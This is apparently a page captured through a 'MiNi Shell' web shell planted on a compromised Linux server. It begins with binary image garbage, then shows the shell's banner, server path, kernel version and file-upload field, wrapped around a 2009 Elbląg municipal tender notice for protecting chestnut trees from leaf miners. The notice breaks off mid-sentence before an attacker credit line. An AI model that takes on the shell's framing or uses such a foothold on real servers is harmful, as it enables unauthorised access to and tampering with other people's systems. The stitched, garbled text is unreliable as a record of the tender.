JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090312/60554-N-2009.html

<p class="kh_header"><b>Elbląg: Przeprowadzenie zabiegów ochronnych w celu zwalczania szrotówka kasztanowcowiaczka na kasztanowcach rosnących na terenie miasta Elbląga</b><br>
<b>Numer ogłoszenia: 60554 - 2009; data zamieszczenia: 12.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina - Miasto Elbląg , ul. Łączności 1, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 055 235 35 36, 055 239 31 25, faks 055 235 35 55, 055 239 33 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umelblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zabiegów ochronnych w celu zwalczania szrotówka kasztanowcowiaczka na kasztanowcach rosnących na terenie miasta Elbląga.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
	          
                       
Przeprowadzenie zabiegów ochronnych w celu zwalczania szrotówka kasztanowcowiaczka na kasztanowcach rosnących na terenie miasta Elbląga.


przedmiot główny:
Nazewnictwo wg CPV:	Usługa pielęgnacji drzew


2.	Zamawiający wymaga:
-  załączenia do oferty  charakterystyki wyrobu - kleju, podanej przez producenta, z której będzie wynikać nazwa kleju oraz, że klej zastosowany przez Wykonawcę spełnia wymagania Zamawiającego określone w Sekcji II.1.3) ppkt 6. b) ogłoszenia,
-  załączenia do oferty atestu na przewidziany do zastosowania klej,
- załączenia do oferty atestu na przewidziany do zastosowania dyspenser feromonowy na szrotówka kasztanowcowiaczka oraz charakterystyki wyrobu podanej przez producenta, z której będzie wynikać, że dyspenser feromonowy spełnia wymagania Zamawiającego  określone w Sekcji II.1.3) ppkt 6. c) ogłoszenia.

3.	Zamawiający informuje, że przewiduje udzielenie zamówień uzupełniających.
     Przewiduje się zamówienie uzupełniające obejmujące przeprowadzenie zabiegów ochronnych w celu zwalczania szrotówka kasztanowcowiaczka dodatkowo na 120 kasztanowcach rosnących na terenie miasta Elbląga. 

4.	Informacja o przewidywanych zmianach postanowień zawartej umowy w stosunku do treści oferty, na podstawie której Zamawiający dokona wyboru Wykonawcy:

1.	Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian 
zawartej umowy w stosunku do treści oferty, na podstawie której dokonany będzie wybór Wykonawcy:
a)	 konieczność przedłużenia terminu umownego z powodu:
-	działania siły wyższej tj. wyjątkowego zdarzenia lub okoliczności 
-	z przyczyn zależnych od Zamawiającego.
	Nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych w czasie realizacji usługi, który przy składaniu ofert musi być normalnie brany pod uwagę (wyjątek stanowią przeszkody atmosferyczne powodujące katastrofy czy klęski żywiołowe).
b)	likwidacja lub rozwiązanie firmy Wykonawcy
c)	zmiana osoby nadzorującej prace ze strony Zamawiającego
d)	zmiana nr konta Wykonawcy lub innych danych podmiotowych.
e)	w przypadku urzędowej zmiany stawek VAT kwota wynagrodzenia brutto zostanie zmieniona
2.	W przypadku żądania zmian umowy, o których mowa w ust. 1. ustala się następujący sposób postępowania:
-	Strona wnioskująca o zmianę jest zobowiązana przesłać projekt zmian do umowy (aneks) w terminie co najmniej 14 dni przed datą upływu terminu zakończenia umowy wraz z pisemnym uzasadnieniem.
-	druga ze Stron jest zobowiązana do udzielenia pisemnej odpowiedzi lub odesłania podpisanego aneksu do umowy przed terminem wykonania umowy.
3.	Warunkiem dokonania zmian postanowień umowy w formie aneksu do umowy jest zgoda obu stron wyrażona na piśmie.
4.	Okoliczności zaistnienia siły wyższej muszą zostać udowodnione przez stronę, która się na nie powołuje.

5.	Zamawiający zastrzega w SIWZ, że zamówienie nie może być powierzone podwykonawcom. 

6.	Zakres zamówienia:

Zakres zamówienia obejmuje:
a)	zakup i założenie na pniach kasztanowców, na wysokości 130 - 150 cm od podstawy pnia, opasek lepowych z przezroczystej folii o szerokości 100 cm, obejmujących cały obwód drzewa
b)	pokrycie opasek niewysychającym klejem, przeznaczonym do samodzielnego nanoszenia, gwarantującym dobrą lepkość i przyczepność owadów, w okresie co najmniej dwóch miesięcy. Klej musi posiadać atest producenta.
c)	zakup i umieszczenie na opaskach lepowych dyspenserów feromonowych na szrotówka kasztanowcowiaczka, o czasie aktywności około 7-8 tygodni, w ilości 1 sztuka na kasztanowiec. Dyspenser feromonowy musi posiadać atest producenta.
d)	zdjęcie opasek lepowych i dyspenserów feromonowych
e)	założenia na każdym z drzew, w sposób nie uszkadzający pnia drzewa, napisu o treści: Uwaga: akcja   
       ochrony kaszatanowców - nie zrywać opasek
f)	zabiegi ochronne należy przeprowadzić na 680 kasztanowcach, w tym o obwodzie pnia:
-	do 120 cm 		- 164 szt. (całkowity obwód wszystkich drzew 14.123 cm)
-	od 121 do 200 cm	- 247 szt. (całkowity obwód wszystkich drzew 38.367 cm)
-	powyżej 200 cm	- 269 szt. (całkowity obwód wszystkich drzew 67.306 cm)

Lokalizację i ilość kasztanowców zawiera WYKAZ KASZTANOWCÓW PRZEWIDZIANYCH DO OBJĘCIA ZABIEGAMI OCHRONNYMI W 2009R. stanowiący załącznik nr 1 do wzoru Umowy stanowiącego ZAŁĄCZNIK NR 3 do SIWZ.

Zamawiający wymaga złożenia:

 - zgodnie z pkt VI ppkt 2.1. SIWZ Oświadczenia wynikającego z art. 25 ust. 1 pkt 2) ustawy Prawo zamówień    publicznych.
Uwaga:
a)	   Treść wymaganego Oświadczenia Zamawiający przekazuje na ZAŁĄCZNIKU NR 2 do SIWZ.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa    każdy z  Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

- zgodnie z pkt VI ppkt 2.2. SIWZ Charakterystyki wyrobu - kleju, który zastosuje Wykonawca do pokrycia opasek lepowych.
Uwaga:
a)	Charakterystyka wyrobu - kleju, podana przez producenta musi zawierać nazwę kleju oraz informacje, że klej spełnia wymagania Zamawiającego określone w pkt III. ppkt 6. b) SIWZ.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony dokument Wykonawcy składają wspólnie.

- zgodnie z pkt VI ppkt 2.3. SIWZ Atestu producenta na przewidziany do zastosowania przez Wykonawcę klej do pokrycia opasek lepowych.
Uwaga:
a)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony dokument Wykonawcy składają wspólnie.

- zgodnie z pkt VI ppkt 2.4. SIWZ Atestu producenta na przewidziany do zastosowania przez Wykonawcę dyspenser feromonowy na szrotówka kasztanowcowiaczka oraz charakterystyka wyrobu.
Uwaga:
a)	Charakterystyka wyrobu podana przez producenta, z której będzie wynikać, że dyspenser feromonowy spełnia wymagania Zamawiającego określone w Sekcji II.1.3) ppkt 6. c) ogłoszenia.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymienione dokumenty Wykonawcy składają wspólnie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.21.15.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu o udzielenie zamówienia mogą wziąć udział Wykonawcy nie podlegający wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych i spełniający warunki art. 22 ust. 1 tj. Wykonawcy, którzy:
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;

Warunkiem udziału w postępowaniu jest:
a)  wykonanie w sposób należyty w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia usług odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia tj. 1 lub kilku usług - łącznie na co najmniej 100 kasztanowcach, polegających na wykonaniu  zabiegów ochronnych w celu zwalczania szrotówka kasztanowcowiaczka.

3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

1) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 1. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI ppkt 1.1. SIWZ oraz dokumentu wymienionego w pkt VI. ppkt 1.2. SIWZ  

2) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 2. a) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VI. ppkt 1.3. SIWZ 

    Przy ocenie spełnienia tego warunku przez Wykonawców wspólnie ubiegających się o udzielenie     zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunku będą zsumowane z dokumentów     składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

3) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 3. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI ppkt 1.1. SIWZ 

4) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 4. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI ppkt 1.1. SIWZ

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych w pkt. VI. SIWZ, metodą spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający wymaga dostarczenia:

-  zgodnie z pkt VI. ppkt 1.1. SIWZ - Oświadczeń wynikających z art. 22 i 24 ustawy Prawo zamówień publicznych
Uwaga:
a)   Treść wymaganych Oświadczeń Zamawiający przekazuje na ZAŁĄCZNIKU NR 2 do SIWZ.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

- zgodnie z pkt VI. ppkt 1.2. SIWZ - Aktualnego  odpisu  z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia  do ewidencji działalności gospodarczej, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Uwaga:
a)  W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy   z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

-  zgodnie z pkt VI. ppkt 1.3. SIWZ - Wykazu wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie.
Uwaga:
a)	W wykazie należy wymienić usługi potwierdzające spełnianie przez Wykonawcę warunku określonego w Sekcji III.2) pkt 2.a) ogłoszenia.
b)	Wykaz należy sporządzić na druku zgodnie ze wzorem stanowiącym ZAŁĄCZNIK NR 4 do SIWZ Wykaz wykonanych przez Wykonawcę w okresie ostatnich trzech lat usług polegających na wykonaniu zabiegów ochronnych w celu zwalczania szrotówka kasztanowcowiaczka.
c)	W przedmiocie wykazywanej usługi należy wskazać jej zakres tj. podać, że usługa polegała na wykonaniu zabiegów ochronnych w celu zwalczania szrotówka kasztanowcowiaczka oraz podać metodę zwalczania szrotówka kasztanowcowiaczka, w kolumnie Ilość kasztanowców należy podać ilość kasztanowców, na których wykonano zabiegi ochronne w celu zwalczania szrotówka kasztanowcowiaczka.
d)	Dla usług wymienionych w wykazie należy załączyć dokumenty potwierdzające, że te usługi zostały wykonane należycie.
e)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w Sekcji III.2) pkt 2.a) ogłoszenia.

Dokumenty należy składać w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
UWAGA:

1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, 
    zamiast dokumentów wymienionych w pkt VI. ppkt 1.2. SIWZ składa dokument lub dokumenty   
    wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
1)  nie otwarto jego likwidacji ani nie ogłoszono upadłości;
	
	Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
	
2.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce 
zamieszkania nie wydaje się dokumentów, o których mowa w pkt 1. UWAGI zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

3.Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.umelblag.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Elblągu
Wydział Zamówień Publicznych pokój 125 
82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2009 godzina 09:30, miejsce: Urząd Miejski w Elblągu Wydział Zamówień Publicznych
                 82-300 Elbląg,  ul. Łączności 1, pokój nr 125.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Opłata za SIWZ obejmuje koszty jej druku oraz przekazania.
CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA
data rozpoczęcia: 	data udzielenia zamówienia
data zakończenia: 	30 czerwca 2009 r.
                                              w tym:
-	założenie opasek lepowych i umieszczenie na opaskach lepowych  dyspenserów feromonowych w terminie do 30 kwietnia 2009 r.,
-	 zdjęcie opasek lepowych i dyspenserów feromonowych w terminie do

Creat By MiNi SheLL
Email: jattceo@gmail.com